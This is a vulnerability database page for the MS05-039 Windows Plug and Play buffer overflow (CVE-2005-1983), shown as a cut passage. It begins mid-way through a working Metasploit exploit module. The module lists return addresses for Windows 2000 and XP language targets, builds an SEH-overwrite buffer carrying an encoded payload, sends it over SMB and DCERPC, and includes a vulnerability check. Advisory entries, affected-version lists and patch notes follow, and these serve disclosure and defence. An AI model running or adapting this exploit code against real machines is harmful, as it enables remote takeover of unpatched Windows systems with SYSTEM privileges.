					[ 'OSVDB', '18605'],
					[ 'BID', '14513'],
					[ 'MSB', 'MS05-039'],
					[ 'URL', 'http://www.hsc.fr/ressources/presentations/null_sessions/'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "",
					'Compat'   => 
					{
						# -ws2ord XXX?
					},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 
						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
						{
							'Ret'      => 0x767a38f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 French',
						{
							'Ret'      => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
						},
					],
					[ 
						'Windows 2000 SP4 Spanish',
						{
							'Ret'      => 0x767738f6, # umpnpmgr.dll
						},
					],
					[ 
						'Windows 2000 SP4 English/French/German/Dutch',
						{
							'Ret'      => 0x01013C79, # [Pita] [Houmous] <pita@mail.com>
						},
					],					
					[ 
						'Windows 2000 SP0-SP4 German',
						{
							'Ret'      => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>	
						},
					],
					[ 
						'Windows 2000 SP0-SP4 Italian',
						{
							'Ret'      => 0x7677366f, # acaro <acaro@jervus.it>
						},
					],
					[
						'Windows XP SP1 English',
						{
							'Ret'      => 0x758c572a,
							'Pipe'     => 'ntsvcs',
							'Offset'   => 16,
						}
					]																		
				],

			'DefaultTarget' => 0,
			'DisclosureDate' => 'Aug 9 2005'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
			], self.class)
						
	end

	def pnp_probe(req, pipe = datastore['SMBPIPE'])
		
		print_status("Connecting to the SMB service...")
		connect()
		smb_login()

		handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		# CS_DES
		cs_des = 
			NDR.long(0) + # CSD_SignatureLength
			NDR.long(0) + # CSD_LegacyDataOffset
			NDR.long(req.length) + # CSD_LegacyDataSize
			NDR.long(0) + # CSD_Flags
			rand_text(16) + # GUID
			req # CSD_LegacyData

		# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
		
		# ResourceName:
		stubdata = 
			NDR.UnicodeConformantVaryingString("a\\b\\c") +  # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
			NDR.long(0xffff) +                               # ResourceID: ResType_ClassSpecific
			NDR.UniConformantArray(cs_des) +                 # Resource (our CS_DES structure)
			NDR.long(cs_des.length) +                        # ResourceLen	
			NDR.long(4) +                                    # OutputLen (at least 4)
			NDR.long(0)                                      # Flags

		print_status("Calling the vulnerable function...")
		
		begin
			dcerpc.call(0x36, stubdata)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			print_good('Server did not respond, this is expected')
		rescue => e
			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
				print_good('Server disconnected, this is expected')
			else
				raise e
			end
		else 
			print_status('The server should have executed our payload')
		end

		# Cleanup
		handler
		disconnect	
	
		if (dcerpc.last_response != nil and 
			dcerpc.last_response.stub_data != nil and 
			dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
			return true
		else 
			return false
		end
	end
	
	def check
		if (pnp_probe('A'))
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit		
		# Pad the string up to reach our SEH frame
		buf = rand_text(target['Offset'] ? target['Offset'] : 56)

		# Jump over the address and our invalid pointer to the payload
		buf << Rex::Arch::X86.jmp_short('$+32')
		buf << rand_text(2)

		# The SEH handler pointer
		buf << [target.ret].pack('V')
		
		# Some padding to reach the next pointer
		buf << rand_text(20)
		
		# ResourceName - cause access violation on RtlInitUnicodeString
		buf << rand_text(3) + "\xff"
		
		# Append the encoded payload and we are good to go!
		buf << payload.encoded
		
		# Determine which pipe to use
		pipe = target['Pipe'] ? target['Pipe'] :  datastore['SMBPIPE']

		pnp_probe(buf, pipe)	
	end

end
    

- Vulnerability Information (F39254)

HOD-ms05039-pnp-expl.c (PacketStormID:F39254)
2005-08-13 00:00:00
houseofdabus
exploit,remote,overflow
windows,2k,xp
CVE-2005-1983

Microsoft Windows Plug-and-Play remote overflow universal exploit that is related to MS05-039. Vulnerable systems include: Microsoft Windows Server 2003 SP1, Microsoft Windows XP SP1 and SP2, and Microsoft Windows 2000 SP4.

- Vulnerability Information (F39227)

ms05039.c (PacketStormID:F39227)
2005-08-12 00:00:00
exploit,remote
windows,2k
CVE-2005-1983

Microsoft Windows 2000 Plug and Play universal remote exploit for the flaw discussed in MS05-039.

- Vulnerability Information (OSVDB 18605)

18605
Microsoft Windows Plug-and-Play Service Remote Overflow
Location: Local Access Required, Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Exploit Public, Exploit Commercial

- Vulnerability Description

A remote overflow exists in Windows. The Plug and Play Service fails to validate the length of a message resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-08-09 Unknown
2005-08-11 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability Author

- Vulnerability Information (BID 14513)

Microsoft Windows Plug and Play Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 14513
Remote: Yes
Local: Yes
Published: 2005-08-09 12:00:00
Updated: 2008-03-13 06:21:00
Credit: Discovery is credited to Neel Mehta of ISS X-Force.

- Affected Versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Web Collaboration Option
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Transport Manager
Cisco Trailhead
Cisco Support Tools
Cisco SN5400 series storage routers
Cisco Remote Monitoring Suite Option
Cisco Personal Assistant 1.4 (2)
Cisco Personal Assistant 1.4 (1)
Cisco Personal Assistant 1.3 (4)
Cisco Personal Assistant 1.3 (3)
Cisco Personal Assistant 1.3 (2)
Cisco Personal Assistant 1.3 (1)
Cisco Outbound Option
Cisco Networking Services for Active Directory
Cisco Media Blender
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Queue Manager
Cisco IP Interactive Voice Response (IP IVR) 3.0
Cisco IP Contact Center Remote Agent
Cisco IP Contact Center Hosted
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco ICM Hosted Edition
Cisco ICM Enterprise Edition
Cisco Emergency Responder 1.1
Cisco E-Mail Manager
Cisco DOCSIS CPE Configurator
Cisco Customer Voice Portal
Cisco Customer Response Application Server
Cisco Conference Connection 1.2
Cisco Conference Connection 1.1 (1)
Cisco Computer Telephony Integration Option
Cisco Collaboration Server 5.0
Cisco Collaboration Server 4.0
Cisco Collaboration Server 3.0 2
Cisco Collaboration Server 3.0 1
Cisco Collaboration Server 3.0
Cisco CNS Network Registrar 6.1.1 .4
Cisco CNS Network Registrar 6.1.1 .3
Cisco CNS Network Registrar 6.1.1 .2
Cisco CNS Network Registrar 6.1.1 .1
Cisco CNS Network Registrar 6.1.1
Cisco CNS Network Registrar 6.1
Cisco CNS Network Registrar 6.0.5 .4
Cisco CNS Network Registrar 6.0.5 .3
Cisco CNS Network Registrar 6.0.5 .2
Cisco CNS Network Registrar 6.0.5
Cisco CNS Network Registrar 6.0.4
Cisco CNS Network Registrar 6.0.3
Cisco CNS Network Registrar 6.0.2
Cisco CNS Network Registrar 6.0.1
Cisco CNS Network Registrar 6.0
Cisco CiscoWorks
Cisco Call Manager 4.1 (3)SR1
Cisco Call Manager 4.1 (3)ES07
Cisco Call Manager 4.1 (2)ES33
Cisco Call Manager 4.0 (2a)SR2b
Cisco Call Manager 4.0 (2a)ES40
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (5)
Cisco Call Manager 3.3 (4)ES25
Cisco Call Manager 3.3 (3)ES61
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 4.5
Cisco Building Broadband Service Manager (BBSM) 4.4
Cisco Building Broadband Service Manager (BBSM) 4.3
Cisco Building Broadband Service Manager (BBSM) 4.2
Cisco Building Broadband Service Manager (BBSM) 4.0.1
Cisco Building Broadband Service Manager (BBSM) 3.0
Cisco Building Broadband Service Manager (BBSM) 2.5.1
Cisco Broadband Troubleshooter

- Not Affected Versions

Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98

- Discussion

Microsoft Windows Plug and Play (PnP) is prone to a buffer-overflow vulnerability.

This issue takes place when the PnP service handles malformed messages containing excessive data.

This vulnerability may allow local attackers to escalate privileges and remote attackers to gain unauthorized access, depending on the underlying operating system. A successful attack may allow arbitrary code to run, resulting in the attacker gaining SYSTEM privileges.

UPDATE (8/23/2005): While investigating this vulnerability, the DeepSight Threat Analyst Team has been able to carry out anonymous remote exploitation against certain nondefault configurations of Windows XP SP1. The attack vector appears when the "Guest" account is both enabled and removed from the "Deny access to this computer from the network" entry in the "User Rights Assignment" Security Policy. This can happen when Simple File and Print Sharing has been enabled, for example by sharing a folder or a printer with the local network. Note that Simple File and Print Sharing is available only on Windows XP machines that are not part of a Windows Active Directory Domain. However, configuring a Windows XP SP1 host to share network resources prior to joining an Active Directory Domain will leave it in the vulnerable state even after the Domain is joined.

Note also that Windows XP SP2 is not prone to this exploitation method. Furthermore, there is no change to Microsoft Security Bulletin MS05-039. Customers who have deployed this update are protected from this issue.

In light of this finding, Microsoft has issued new information regarding the patch for the Microsoft Windows Plug and Play Buffer Overflow Vulnerability (see Microsoft Security Advisory 906574: http://www.microsoft.com/technet/security/advisory/906574.mspx).

- Exploit

The researchers responsible for discovering this issue have developed exploit code.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploits are available:

- Solution

Microsoft has released fixes to address this vulnerability in supported platforms.

Cisco has released a security notice detailing their mitigation recommendations with regard to this vulnerability.

Fixes are listed for the following platforms:

Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows 2000 Professional SP4
Microsoft Windows XP Media Center Edition SP2

- References


About the SCAP Chinese Community

The SCAP Chinese Community (SCAP中文社区) is the first open Chinese-language community dedicated to SCAP. For more information, see the About page of this site.

Copyright Notice

CVE, CWE and OVAL are registered trademarks of The MITRE Corporation; their official data sources are maintained on MITRE's websites.